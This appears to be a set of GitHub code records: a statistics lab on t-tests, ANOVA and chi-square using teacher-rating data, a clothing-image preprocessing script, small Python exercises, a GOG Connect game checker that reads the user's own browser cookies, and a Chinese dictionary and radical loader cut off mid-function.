probability of the null hypothesis being true, and finally interpret the result of the p-value, if the value is low, the effect is said to be statistically significant, which means that the null hypothesis may not be accurate.\n# \n\n# ## Objectives\n# \n\n# * Import Libraries\n# * Lab exercises\n# * Stating the hypothesis\n# * Levene's Test for equality\n# * Preparing your data for hypothesis testing\n# * Quiz\n# \n\n# ## Import Libraries\n# \n\n# All Libraries required for this lab are listed below. The libraries pre-installed on Skills Network Labs are commented. If you run this notebook in a different environment, e.g. your desktop, you may need to uncomment and install certain libraries.\n# \n\n# In[ ]:\n\n\n#install specific version of libraries used in lab\n#! mamba install pandas==1.3.3\n#! mamba install numpy=1.21.2\n#! mamba install scipy=1.7.1-y\n#! mamba install seaborn=0.9.0-y\n#! mamba install matplotlib=3.4.3-y\n#! mamba install statsmodels=0.12.0-y\n\n\n# Import the libraries we need for the lab\n# \n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport scipy.stats\n\n\n# Read in the csv file from the URL using the request library\n# \n\n# In[2]:\n\n\nratings_url = 'https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ST0151EN-SkillsNetwork/labs/teachingratings.csv'\ndf = pd.read_csv(ratings_url)\n\n\n# ### T-Test: Using the teachers' rating data set, does gender affect teaching evaluation rates?\n# \n\n# We will be using the t-test for independent samples. For the independent t-test, the following assumptions must be met.\n# \n# * One independent, categorical variable with two levels or group\n# * One dependent continuous variable\n# * Independence of the observations. Each subject should belong to only one group. 
There is no relationship between the observations in each group.\n# * The dependent variable must follow a normal distribution\n# * Assumption of homogeneity of variance\n# \n\n# State the hypothesis\n# \n# * $H\\_0: µ\\_1 = µ\\_2$ (\"there is no difference in evaluation scores between male and females\")\n# * $H\\_1: µ\\_1 ≠ µ\\_2$ (\"there is a difference in evaluation scores between male and females\")\n# \n\n# We can plot the dependent variable with a historgram\n# \n\n# In[4]:\n\n\nax = sns.distplot(df['eval'],\n bins=20,\n kde=True,\n color='red',\n hist_kws={\"linewidth\": 15,'alpha':1})\nax.set(xlabel='Normal Distribution', ylabel='Frequency')\n## we can assume it is normal\n\n\n# We can use the Levene's Test in Python to check test significance\n# \n\n# In[6]:\n\n\nscipy.stats.levene(df[df['gender'] == 'female']['eval'],\n df[df['gender'] == 'male']['eval'], center='mean')\n\n# since the p-value is greater than 0.05 we can assume equality of variance\n\n\n# Use the ttest_ind from the scipy_stats library\n# \n\n# In[7]:\n\n\nscipy.stats.ttest_ind(df[df['gender'] == 'female']['eval'],\n df[df['gender'] == 'male']['eval'], equal_var = True)\n\n\n# **Conclusion:** Since the p-value is less than alpha value 0.05, we reject the null hypothesis as there is enough proof that there is a statistical difference in teaching evaluations based on gender\n# \n\n# ### ANOVA: Using the teachers' rating data set, does beauty score for instructors differ by age?\n# \n\n# First, we group the data into cateries as the one-way ANOVA can't work with continuous variable - using the example from the video, we will create a new column for this newly assigned group our categories will be teachers that are:\n# \n# * 40 years and younger\n# * between 40 and 57 years\n# * 57 years and older\n# \n\n# In[9]:\n\n\ndf.loc[(df['age'] <= 40), 'age_group'] = '40 years and younger'\ndf.loc[(df['age'] > 40)&(df['age'] < 57), 'age_group'] = 'between 40 and 57 years'\ndf.loc[(df['age'] >= 57), 'age_group'] = '57 years and older'\n\n\n# State the hypothesis\n# \n# * $H\\_0: µ\\_1 = µ\\_2 = µ\\_3$ (the three population means are equal)\n# * $H\\_1:$ At least one of the means differ\n# \n\n# Test for equality of variance\n# \n\n# In[10]:\n\n\nscipy.stats.levene(df[df['age_group'] == '40 years and younger']['beauty'],\n df[df['age_group'] == 'between 40 and 57 years']['beauty'], \n df[df['age_group'] == '57 years and older']['beauty'], \n center='mean')\n# since the p-value is less than 0.05, the variance are not equal, for the purposes of this exercise, we will move along\n\n\n# First, separate the three samples (one for each job category) into a variable each.\n# \n\n# In[12]:\n\n\nforty_lower = df[df['age_group'] == '40 years and younger']['beauty']\nforty_fiftyseven = df[df['age_group'] == 'between 40 and 57 years']['beauty']\nfiftyseven_older = df[df['age_group'] == '57 years and older']['beauty']\n\n\n# Now, run a one-way ANOVA.\n# \n\n# In[14]:\n\n\nf_statistic, p_value = scipy.stats.f_oneway(forty_lower, forty_fiftyseven, fiftyseven_older)\nprint(\"F_Statistic: {0}, P-Value: {1}\".format(f_statistic,p_value))\n\n\n# **Conclusion:** Since the p-value is less than 0.05, we will reject the null hypothesis as there is significant evidence that at least one of the means differ.\n# \n\n# ### ANOVA: Using the teachers' rating data set, does teaching evaluation score for instructors differ by age?\n# \n\n# Test for equality of variance\n# \n\n# In[15]:\n\n\nscipy.stats.levene(df[df['age_group'] == '40 years and 
younger']['eval'],\n df[df['age_group'] == 'between 40 and 57 years']['eval'], \n df[df['age_group'] == '57 years and older']['eval'], \n center='mean')\n\n\n# In[16]:\n\n\nforty_lower_eval = df[df['age_group'] == '40 years and younger']['eval']\nforty_fiftyseven_eval = df[df['age_group'] == 'between 40 and 57 years']['eval']\nfiftyseven_older_eval = df[df['age_group'] == '57 years and older']['eval']\n\n\n# In[17]:\n\n\nf_statistic, p_value = scipy.stats.f_oneway(forty_lower_eval, forty_fiftyseven_eval, fiftyseven_older_eval)\nprint(\"F_Statistic: {0}, P-Value: {1}\".format(f_statistic,p_value))\n\n\n# **Conclusion:** Since the p-value is greater than 0.05, we will fail to reject the null hypothesis as there is no significant evidence that at least one of the means differ.\n# \n\n# ### Chi-square: Using the teachers' rating data set, is there an association between tenure and gender?\n# \n\n# State the hypothesis:\n# \n# * $H\\_0:$ The proportion of teachers who are tenured is independent of gender\n# * $H\\_1:$ The proportion of teachers who are tenured is associated with gender\n# \n\n# Create a Cross-tab table\n# \n\n# In[18]:\n\n\ncont_table = pd.crosstab(df['tenure'], df['gender'])\ncont_table\n\n\n# Use the scipy.stats library and set correction equals False as that will be the same answer when done by hand, it returns: 𝜒2 value, p-value, degree of freedom, and expected values.\n# \n\n# In[25]:\n\n\nscipy.stats.chi2_contingency(cont_table, correction = True)\n\n\n# **Conclusion:** Since the p-value is greater than 0.05, we fail to reject the null hypothesis. As there is no sufficient evidence that teachers are tenured as a result of gender.\n# \n\n# ### Correlation: Using the teachers rating dataset, Is teaching evaluation score correlated with beauty score?\n# \n\n# State the hypothesis:\n# \n# * $H\\_0:$ Teaching evaluation score is not correlated with beauty score\n# * $H\\_1:$ Teaching evaluation score is correlated with beauty score\n# \n\n# Since they are both continuous variables we can use a pearson correlation test and draw a scatter plot\n# \n\n# In[26]:\n\n\nax = sns.scatterplot(x=\"beauty\", y=\"eval\", data=df)\n\n\n# In[27]:\n\n\nscipy.stats.pearsonr(df['beauty'], df['eval'])\n\n\n# **Conclusion:** Since the p-value (Sig. 
(2-tailed) < 0.05, we reject the Null hypothesis and conclude that there exists a relationship between beauty and teaching evaluation score.\n# \n\n# ## Practice Questions\n# \n\n# ### Question 1: Using the teachers rating data set, does tenure affect teaching evaluation scores?\n# \n# * Use α = 0.05\n# \n\n# In[49]:\n\n\n# null hypo: there is no difference\n\n\n# In[30]:\n\n\nsns.distplot(df['eval'], bins=20, kde=True)\n\n\n# In[33]:\n\n\nscipy.stats.levene(df[df['tenure'] == 'yes']['eval'], df[df['tenure'] == 'no']['eval'], center='mean')\n\n\n# In[35]:\n\n\n# p value > 0.05 fail to reject so variances are equal\n\nscipy.stats.ttest_ind(df[df['tenure'] == 'yes']['eval'], df[df['tenure'] == 'no']['eval'], equal_var=True)\n\n# p value < 0.05 reject so tenured affects eval\n\n\n# ### Question 2: Using the teachers rating data set, is there an association between age and tenure?\n# \n# * Discretize the age into three groups 40 years and youngers, between 40 and 57 years, 57 years and older (This has already been done for you above.)\n# * What is your conclusion at α = 0.01 and α = 0.05?\n# \n\n# In[36]:\n\n\n# null hypo: there is no association betwwen age and tenure\n# alternative hypo: there is association betwwen age and tenure\n\n\n# In[40]:\n\n\nct = pd.crosstab(df['tenure'],df['age_group'])\nct\n\n\n# In[42]:\n\n\n#categorical chi square test\n\nscipy.stats.chi2_contingency(ct,correction=True)\n\n\n# In[43]:\n\n\n# α = 0.01, p value > α fail to reject\n# α = 0.05, p value < α reject\n\n\n# ### Question 3: Test for equality of variance for beauty scores between tenured and non-tenured instructors\n# \n# * Use α = 0.05\n# \n\n# In[44]:\n\n\nscipy.stats.levene(df[df['tenure'] == 'yes']['beauty'], df[df['tenure'] == 'no']['beauty'], center='mean')\n\n\n# In[45]:\n\n\nprint('\\u03B1')\n\n\n# In[46]:\n\n\n# p value > α fail to reject variances are equal\n\n\n# ### Question 4: Using the teachers rating data set, is there an association between visible minorities and tenure?\n# \n# * Use α = 0.05\n# \n\n# In[50]:\n\n\n# null hypo : there is no association between visible minorities and tenure\n\n\n# In[54]:\n\n\nct = pd.crosstab(df['tenure'],df['minority'])\nct\n\n\n# In[56]:\n\n\n#categorical chi square test\n\nscipy.stats.chi2_contingency(ct,correction=True)\n\n\n# In[57]:\n\n\n# p > α fail to reject so variances are equal\n\n","repo_name":"aumitcaliskan/Probability_and_Statistics","sub_path":"04_Hypothesis_Testing.py","file_name":"04_Hypothesis_Testing.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"18631744198","text":"import zipfile\nimport io\nimport os\nimport pandas as pd\nimport numpy as np\nfrom keras.preprocessing.image import image_utils\nfrom datasets import Dataset\nfrom datasets import Features, ClassLabel, Array3D\nfrom transformers import ViTImageProcessor\nimport random\n\n\ndef load_data():\n if not os.path.exists('./clothing-dataset/images.csv'):\n zf = zipfile.ZipFile(io.BytesIO('clothing-dataset.zip'), \"r\")\n zf.extractall()\n\n df = pd.read_csv('./clothing-dataset/images.csv').set_index('image')\n return df\n\n\ndef label_data(df : pd.DataFrame):\n top_labels = pd.DataFrame(df.groupby('label').size().reset_index().sort_values(0,ascending = False)['label'])\n top_labels = top_labels[top_labels.label!='Not sure']\n top_labels = top_labels[top_labels.label!='Other']\n top_labels = top_labels[top_labels.label!='Top']\n top_labels = 
top_labels[top_labels.label!='Skip']\n top_labels = top_labels[top_labels.label!='Undershirt']\n\n top_labels_list = sorted(list(top_labels['label']))\n top_labels['label_num'] = top_labels['label'].apply(lambda x: top_labels_list.index(x))\n\n return top_labels, top_labels_list\n\n\ndef label_data_from_database(df : pd.DataFrame):\n top_labels = pd.DataFrame(df.groupby('Label').size().reset_index().sort_values(0,ascending = False)['Label'])\n top_labels = top_labels[top_labels.Label!='Not sure']\n top_labels = top_labels[top_labels.Label!='Other']\n top_labels = top_labels[top_labels.Label!='Top']\n top_labels = top_labels[top_labels.Label!='Skip']\n top_labels = top_labels[top_labels.Label!='Undershirt']\n \n top_labels_list = sorted(list(top_labels['Label']))\n top_labels['label_num'] = top_labels['Label'].apply(lambda x: top_labels_list.index(x))\n\n return top_labels, top_labels_list\n\n\ndef filter_data(df : pd.DataFrame, top_labels : pd.DataFrame):\n data_filtered = pd.merge(df.reset_index(), top_labels).set_index('image')\n data_filtered['label_str'] = data_filtered['label']\n data_filtered['label'] = data_filtered['label_num']\n\n return data_filtered\n\n\ndef load_images(data_filtered : pd.DataFrame):\n labeled_data = []\n for i, item in enumerate(os.listdir( './clothing-dataset/images' )):\n path = os.path.join('./clothing-dataset/images', item) \n img = image_utils.load_img(path, target_size=(32, 32))\n \n x = image_utils.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])[0].tolist()\n\n try:\n label = data_filtered.loc[item[:-4],'label']\n labeled_data.append({'img':images, 'label':label, 'index':item[:-4]})\n except:\n label = 'no_data'\n\n return labeled_data\n\n\ndef load_images_from_database(images_info, images_binaries):\n labeled_data = []\n df = images_info.load_as_df()\n for i, item in enumerate(df[\"Image\"].tolist()):\n try:\n img = image_utils.load_img(images_binaries.load_image(item+\".jpg\"), target_size=(32, 32))\n except:\n continue\n \n x = image_utils.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])[0].tolist()\n\n try:\n label = df.loc[df[\"Image\"] == item, 'Label']\n labeled_data.append({'img':images, 'label':label, 'index':item})\n except:\n label = 'no_data'\n\n return labeled_data\n\n\ndef split_data(data_filtered : pd.DataFrame, labeled_data : list):\n ind = data_filtered.index.tolist()\n random.shuffle(ind)\n\n n = len(data_filtered)\n p_train = 0.6\n p_val = 0.2\n n_train = int(p_train*n)\n n_val = int(p_val*n)\n train_ind = ind[:n_train]\n val_ind = ind[n_train:(n_train+n_val)]\n test_ind = ind[(n_train+n_val):]\n\n train_img = []\n val_img = []\n test_img = []\n train_label = []\n val_label = []\n test_label = []\n test_ids = []\n\n for img in labeled_data:\n if img['index'] in train_ind:\n train_img.append(img['img'])\n train_label.append(img['label'])\n elif img['index'] in val_ind:\n val_img.append(img['img'])\n val_label.append(img['label'])\n elif img['index'] in test_ind:\n test_img.append(img['img'])\n test_label.append(img['label'])\n test_ids.append(img['index'])\n\n return train_img, val_img, test_img, train_label, val_label, test_label, test_ids\n\n\ndef split_data_from_database(df : pd.DataFrame, labeled_data : list):\n imgs = df[\"Image\"].tolist()\n random.shuffle(imgs)\n\n n = len(df)\n p_train = 0.6\n p_val = 0.2\n n_train = int(p_train*n)\n n_val = int(p_val*n)\n train_ind = imgs[:n_train]\n val_ind = imgs[n_train:(n_train+n_val)]\n test_ind = imgs[(n_train+n_val):]\n\n train_img = 
[]\n val_img = []\n test_img = []\n train_label = []\n val_label = []\n test_label = []\n test_ids = []\n\n for img in labeled_data:\n if img['index'] in train_ind:\n train_img.append(img['img'])\n train_label.append(img['label'])\n elif img['index'] in val_ind:\n val_img.append(img['img'])\n val_label.append(img['label'])\n elif img['index'] in test_ind:\n test_img.append(img['img'])\n test_label.append(img['label'])\n test_ids.append(img['index'])\n \n return train_img, val_img, test_img, train_label, val_label, test_label, test_ids\n\n\ndef preprocess_images(top_labels_list : list, train_img : list, val_img : list, test_img : list, train_label : list, val_label : list, test_label : list):\n train_ds = preprocess_images_list(top_labels_list, train_img, train_label)\n val_ds = preprocess_images_list(top_labels_list, val_img, val_label)\n test_ds = preprocess_images_list(top_labels_list, test_img, test_label)\n \n return train_ds, val_ds, test_ds\n\n\ndef preprocess_images_list(top_labels_list : list, list_img : list, list_label : list):\n ds = Dataset.from_dict({'img':list_img,'label':list_label})\n\n feature_extractor = ViTImageProcessor.from_pretrained('google/vit-base-patch16-224-in21k')\n\n def preprocess(ds):\n images = ds['img']\n\n images = [np.array(image, dtype=np.uint8) for image in images]\n images = [np.moveaxis(image, source=-1, destination=0) for image in images]\n\n inputs = feature_extractor(images=images)\n ds['pixel_values'] = inputs['pixel_values']\n\n return ds\n \n features = Features({\n 'label': ClassLabel(names = top_labels_list),\n 'img': Array3D(dtype=\"int64\", shape=(3,32,32)),\n 'pixel_values': Array3D(dtype=\"float32\", shape=(3, 224, 224)),\n })\n \n ds = ds.map(preprocess, batched=True, features=features)\n \n return ds\n\n\ndef main():\n df = load_data()\n print(df.head())\n top_labels, top_labels_list = label_data(df)\n print(top_labels)\n data_filtered = filter_data(df, top_labels)\n print(data_filtered.head())\n labeled_data = load_images(data_filtered)\n print(labeled_data[0])\n train_img, val_img, test_img, train_label, val_label, test_label, test_ids = split_data(data_filtered, labeled_data)\n print(len(train_img), len(val_img), len(test_img))\n train_ds, val_ds, test_ds = preprocess_images(top_labels_list, train_img, val_img, test_img, train_label, val_label, test_label)\n print(train_ds)\n print(val_ds)\n print(test_ds)\n\nif __name__ == \"__main__\":\n main()","repo_name":"BrunoSienkiewicz/Clothing_similarity","sub_path":"model/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39491090908","text":"def leiaInt(x):\n valor = 0\n while True:\n n = str(input(x))\n if n.isnumeric():\n valor = int(n)\n return valor\n else:\n print('\\033[0;31mERRO. 
Tente Novamente.\\033[m')\nn = leiaInt('Digite um número: ')\nprint(f'Número digitado: {n}')","repo_name":"brenopremoli/curso_em_video","sub_path":"python/exercicios/ex104.py","file_name":"ex104.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42214177827","text":"#通过Python 计算一元二次方程\n#二次方程的基本格式 ax**2 + bx + c = 0\n\nimport cmath\n\nprint(\"二次方程的基本格式 ax^2 + bx + c = 0\")\na = float(input('输入a:'))\nb = float(input(\"输入b:\"))\nc = float(input(\"输入c:\"))\n\ndlet = (b**2) - (4*a*c)\n\n#注意这里引入了复数的概念,通过cmath计算得到答案\nanw1 = (-b-cmath.sqrt(dlet))/(2*a)\nanw2 = (-b+cmath.sqrt(dlet))/(2*a) \nprint(\"结果为{} 和 {}\".format(anw1,anw2))\n","repo_name":"Ehco1996/PythonPractice","sub_path":"菜鸟练习题/练习实例/004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"zh","doc_type":"code","stars":47,"dataset":"github-code","pt":"94"} +{"seq_id":"72652710069","text":"#!/usr/bin/env python2\n# Script to check for new GOG Connect games\n#\n# Configure your system for sending emails first. I used:\n# https://www.howtoforge.com/tutorial/configure-postfix-to-use-gmail-as-a-mail-relay/\nimport requests\nimport browsercookie\nimport json\nimport smtplib\nfrom email.mime.text import MIMEText\n\n# Fill in your email here\nEMAIL = \"\"\n\nsession = requests.Session()\nsession.headers[\"User-Agent\"] = \"Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0\"\n\n# Load cookies from Firefox\nsession.cookies = browsercookie.firefox()\n# Uncomment for Chrome\n#session.cookies = browsercookie.chrome()\n\nuser_data = json.loads(session.get(\"https://www.gog.com/userData.json\").text)\n\n# Refresh Steam products\nrefresh_url = \"https://www.gog.com/api/v1/users/{}/gogLink/steam/synchronizeUserProfile\".format(\n user_data[\"userId\"]\n)\n\nsession.get(refresh_url)\n\nsteam_products_url = \"http://www.gog.com/api/v1/users/{}/gogLink/steam/exchangeableProducts\".format(\n user_data[\"userId\"]\n)\n\nsteam_products = json.loads(session.get(steam_products_url).text)\n\ngames_available = False\nfor key, value in steam_products[\"items\"].items():\n if value[\"status\"] == \"available\":\n games_available = True\n break\n\nif games_available:\n print(\"New games available!\")\n msg = MIMEText(\"Redeem them here:\\nhttps://gog.com/connect/\")\n msg[\"Subject\"] = \"New GOG Connect games available!\"\n msg[\"From\"] = EMAIL\n msg[\"To\"] = EMAIL\n s = smtplib.SMTP(\"localhost\")\n s.sendmail(EMAIL, [EMAIL], msg.as_string())\n s.quit()\nelse:\n print(\"No new games available\")\n","repo_name":"gistable/gistable","sub_path":"dockerized-gists/511888530967f4d3fabe882c4d00575a/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"94"} +{"seq_id":"38681473454","text":"import pathlib\nimport csv\nimport json\nimport re\nimport random\nfrom collections import UserDict\nimport math\nimport decimal\nfrom decimal import Decimal\nimport statistics\nrandom.seed()\n\nfields = {\n 'kAccountingNumeric': 'numeric',\n 'kBigFive': 'big_five',\n 'kCangjie': 'cangjie',\n 'kCantonese': 'cantonese',\n 'kCCCII': 'cccii',\n 'kCheungBauer': 'cheung_bauer',\n 'kCheungBauerIndex': 'cheung_bauer_index',\n 'kCihaiT': 'cihait',\n 'kCNS1986': 'cns1986',\n 'kCNS1992': 'cnd1992',\n 'kCompatibilityVariant': 'compatibility_variant',\n 'kCowles': 'cowles',\n 'kDaeJaweon': 'dae_jaweon',\n 'kDefinition': 
'definition',\n 'kEACC': 'eacc',\n 'kFenn': 'fenn',\n 'kFennIndex': 'fenn_index',\n 'kFourCornerCode': 'four_corner',\n 'kFrequency': 'frequency',\n 'kGB0': 'gb0',\n 'kGB1': 'gb1',\n 'kGB3': 'gb3',\n 'kGB5': 'gb5',\n 'kGB7': 'gb7',\n 'kGB8': 'gb8',\n 'kGradeLevel': 'grade_level',\n 'kGSR': 'gsr',\n 'kHangul': 'hangul',\n 'kHanYu': 'hanyu',\n 'kHanyuPinlu': 'hanyu_pinlu',\n 'kHanyuPinyin': 'hanyu_pinyin',\n 'kHDZRadBreak': 'hdz_rad_break',\n 'kHKGlyph': 'hk_glyph',\n 'kHKSCS': 'hkscs',\n 'kIBMJapan': 'ibm_japan',\n 'kIICore': 'iicore',\n 'kJapaneseKun': 'japanese_kun',\n 'kJapaneseOn': 'japanese_on',\n 'kJis0': 'jis0',\n 'kJis1': 'jis1',\n 'kJIS0213': 'jis2013',\n 'kKangXi': 'kangxi',\n 'kKarlgren': 'karlgren',\n 'kKorean': 'korean',\n 'kKPS0': 'kps0',\n 'kKPS1': 'kps1',\n 'kKSC0': 'ksc0',\n 'kKSC1': 'ksc1',\n 'kLau': 'lau',\n 'kMainlandTelegraph': 'mainland_telegraph',\n 'kMandarin': 'mandarin',\n 'kMatthews': 'matthews',\n 'kMeyerWempe': 'meyer_wempe',\n 'kMorohashi': 'morohashi',\n 'kNelson': 'nelson',\n 'kOtherNumeric': 'numeric',\n 'kPhonetic': 'phonetic',\n 'kPrimaryNumeric': 'numeric',\n 'kRSAdobe_Japan1_6': 'rs_adobe',\n 'kRSJapanese': 'rs_japanese',\n 'kRSKangXi': 'rs_kangxi',\n 'kRSKanWa': 'rs_kanwa',\n 'kRSKorean': 'rs_korean',\n 'kRSUnicode': 'rs_unicode',\n 'kSBGY': 'sbgy',\n 'kSemanticVariant': 'semantic_variant',\n 'kSimplifiedVariant': 'simplified_variant',\n 'kSpecializedSemanticVariant': 'specialized_semantic',\n 'kTaiwanTelegraph': 'taiwan_telegraph',\n 'kTang': 'tang',\n 'kTotalStrokes': 'total_strokes',\n 'kTraditionalVariant': 'traditional_variant',\n 'kVietnamese': 'vietnamese',\n 'kXerox': 'xerox',\n 'kXHC1983': 'xhc1983',\n 'kZVariant': 'z_variant'\n}\n\ndef load_unihan():\n unihan = dict()\n unihan_folder = pathlib.Path('data/unihan')\n for child in unihan_folder.iterdir():\n with child.open('r', encoding='utf-8', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter='\\t')\n for row in csvreader:\n if len(row) <= 0:\n pass\n elif row[0][0] == '#':\n pass\n elif row[0][0:2] == 'U+':\n char = chr(int(row[0][2:], 16))\n if char not in unihan:\n unihan[char] = {}\n\n field = row[1]\n value = row[2]\n\n if field in fields:\n unihan[char][fields[field]] = value\n\n return unihan\n\ndef load_cedict():\n entry = re.compile(r\"^(?P\\w+)\\s{1}(?P\\w+)\\s{1}\\[(?P.+)\\]\\s{1}/(?P.+)\")\n\n cedict = dict()\n cedict_file = pathlib.Path('data/cedict_1_0_ts_utf-8_mdbg.txt')\n with cedict_file.open('r', encoding='utf-8') as dictreader:\n count = 0\n for line in dictreader:\n if line[0] == '#':\n pass\n else:\n match = entry.match(line)\n if match is not None:\n simplified = match.group('simplified')\n if simplified not in cedict:\n cedict[simplified] = dict()\n cedict[simplified]['simplified'] = match.group('simplified')\n cedict[simplified]['traditional'] = match.group('traditional')\n cedict[simplified]['pinyin'] = match.group('pinyin').lower()\n cedict[simplified]['definitions'] = match.group('definitions')[0:-1].split('/')\n\n cedictchars = list()\n for word in cedict:\n chars = tuple(word)\n for char in chars:\n if char not in cedictchars:\n cedictchars.append(char)\n return cedict, cedictchars\n\ndef load_hsk():\n hsk = dict()\n hskwords = dict()\n hsk['word'] = hskwords\n hsk_file = pathlib.Path('data/hsk_words.csv')\n with hsk_file.open('r', encoding='utf-8', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter='\\t')\n for row in csvreader:\n if len(row) <= 0:\n pass\n elif row[0][0] == '#':\n pass\n else:\n level, simp, trad, pinyin_num, 
pinyin_mark, definition = tuple(row)\n if simp not in hskwords:\n hskwords[simp] = {\n 'level': level,\n 'simplified': simp,\n 'traditional': trad,\n 'pinyin': pinyin_num,\n 'pinyin_num': pinyin_num,\n 'pinyin_mark': pinyin_mark,\n 'definition': definition\n }\n\n hskchars = dict()\n hsk['char'] = hskchars\n for word in hskwords:\n chars = tuple(word)\n for char in chars:\n if char not in hskchars:\n hskchars[char] = {\n 'level': hskwords[word]['level']\n }\n\n return hsk\n\ndef load_subtlex():\n subtlex = dict()\n subtlex_folder = pathlib.Path('data/subtlex-ch')\n for child in subtlex_folder.iterdir():\n if 'csv' not in child.suffix:\n continue\n with child.open('r', encoding='utf-8', newline='') as csvfile:\n corpus_type = None\n if 'CHR' in child.stem:\n corpus_type = 'char'\n elif 'WF' in child.stem:\n corpus_type = 'word'\n else:\n raise ValueError('Incompatible or unknown SUBTLEX-CH corpus type')\n\n corpus = dict()\n subtlex[corpus_type] = corpus\n csvreader = csv.reader(csvfile, delimiter='\\t')\n\n token_string = next(csvreader)[0]\n tokens = int(''.join([x for x in token_string if x.isdigit()]))\n corpus['tokens'] = tokens\n\n context_string = next(csvreader)[0]\n contexts = int(''.join([str(x) for x in context_string if x.isdigit()]))\n corpus['contexts'] = contexts\n # Skip headers\n next(csvreader)\n\n # Process rows\n for row in csvreader:\n token, count, tpm, log_count, cd, cd_percent, log_cd = tuple(row)\n\n corpus[token] = {\n 'token': token,\n 'count': count,\n 'tpm': tpm,\n 'log_count':log_count,\n 'contexts': cd,\n 'contexts_percent': cd_percent,\n 'log_contexts': log_cd\n }\n\n return subtlex\n\ndef load_radicals():\n radical_dict = {\n 1: '一', 2: '丨', 3: '丶', 4: '丿', 5: '乙', 6: '亅', 7: '二', 8: '亠', 9: '人', 10: '儿',\n 11: '入', 12: '八', 13: '冂', 14: '冖', 15: '冫', 16: '几', 17: '凵', 18: '刀', 19: '力', 20: '勹',\n 21: '匕', 22: '匚', 23: '匸', 24: '十', 25: '卜', 26: '卩', 27: '厂', 28: '厶', 29: '又', 30: '口',\n 31: '囗', 32: '土', 33: '士', 34: '夂', 35: '夊', 36: '夕', 37: '大', 38: '女', 39: '子', 40: '宀',\n 41: '寸', 42: '小', 43: '尢', 44: '尸', 45: '屮', 46: '山', 47: '川', 48: '工', 49: '己', 50: '巾',\n 51: '干', 52: '幺', 53: '广', 54: '廴', 55: '廾', 56: '弋', 57: '弓', 58: '彐', 59: '彡', 60: '彳',\n 61: '心', 62: '戈', 63: '戶', 64: '手', 65: '支', 66: '攴', 67: '文', 68: '斗', 69: '斤', 70: '方',\n 71: '无', 72: '日', 73: '曰', 74: '月', 75: '木', 76: '欠', 77: '止', 78: '歹', 79: '殳', 80: '毋',\n 81: '比', 82: '毛', 83: '氏', 84: '气', 85: '水', 86: '火', 87: '爪', 88: '父', 89: '爻', 90: '爿',\n 91: '片', 92: '牙', 93: '牛', 94: '犬', 95: '玄', 96: '玉', 97: '瓜', 98: '瓦', 99: '甘', 100: '生',\n 101: '用', 102: '田', 103: '疋', 104: '疒', 105: '癶', 106: '白', 107: '皮', 108: '皿', 109: '目', 110: '矛',\n 111: '矢', 112: '石', 113: '示', 114: '禸', 115: '禾', 116: '穴', 117: '立', 118: '竹', 119: '米', 120: '纟',\n 121: '缶', 122: '网', 123: '羊', 124: '羽', 125: '老', 126: '而', 127: '耒', 128: '耳', 129: '聿', 130: '肉',\n 131: '臣', 132: '自', 133: '至', 134: '臼', 135: '舌', 136: '舛', 137: '舟', 138: '艮', 139: '色', 140: '艸',\n 141: '虍', 142: '虫', 143: '血', 144: '行', 145: '衣', 146: '襾', 147: '见', 148: '角', 149: '讠', 150: '谷',\n 151: '豆', 152: '豕', 153: '豸', 154: '贝', 155: '赤', 156: '走', 157: '足', 158: '身', 159: '车', 160: '辛',\n 161: '辰', 162: '辵', 163: '邑', 164: '酉', 165: '釆', 166: '里', 167: '金', 168: '长', 169: '门', 170: '阜',\n 171: '隶', 172: '隹', 173: '雨', 174: '青', 175: '非', 176: '面', 177: '革', 178: '韦', 179: '韭', 180: '音',\n 181: '页', 182: '风', 183: '飞', 184: '饣', 185: '首', 186: '香', 187: '马', 188: '骨', 189: '高', 190: '髟',\n 191: '鬥', 192: '鬯', 193: '鬲', 194: 
'鬼', 195: '鱼', 196: '鸟', 197: '鹵', 198: '鹿', 199: '麦', 200: '麻',\n 201: '黃', 202: '黍', 203: '黑', 204: '黹', 205: '黾', 206: '鼎', 207: '鼓', 208: '鼡', 209: '鼻', 210: '齐',\n 211: '齿', 212: '龙', 213: '龟', 214: '龠'\n }\n return radical_dict\n\nclass _Syllable():\n\n def __init__(self, pinyin, syllable):\n self.pinyin = pinyin\n self.syllable = syllable\n\n def __getattr__(self, key):\n if key in self.syllable:\n return self.syllable[key]\n\n def __getitem__(self, key):\n if key in self.syllable:\n return self.syllable[key]\n elif key is 'pinyin':\n return self.pinyin\n\n def __repr__(self):\n return str(self.syllable)\n\n # def count_vowels(self):\n # return len([1 for x in self.syllable['nucleus'] if x != [0,0,0]])\n\nclass _Syllables():\n\n def __init__(self, syllables):\n self.syllables = {key: _Syllable(key, value) for (key, value) in syllables.items()}\n\n def __getitem__(self, key):\n if key in self.syllables:\n return self.syllables[key]\n\n def __iter__(self):\n return iter(self.syllables)\n\n def _slot_distance(self, slot, s1, s2):\n # phoneme_slots = {\n # 1: 'onset',\n # 2: 'glide',\n # 3: 'nucleus',\n # 4: 'coda',\n # 5: 'tone'\n # }\n #\n # if type(slot) is int:\n # slot = phoneme_slots[slot]\n\n phoneme1 = self.syllables[s1][slot]\n phoneme2 = self.syllables[s2][slot]\n\n # if phoneme1 == [0.0, 0.0, 0.0] and phoneme2 == [0.0, 0.0, 0.0]:\n # return None\n\n return self._compute_distance(phoneme1, phoneme2)\n\n def onset_distance(self, s1, s2):\n on_distance = self._slot_distance('onset', s1, s2)\n gl_distance = self._slot_distance('glide', 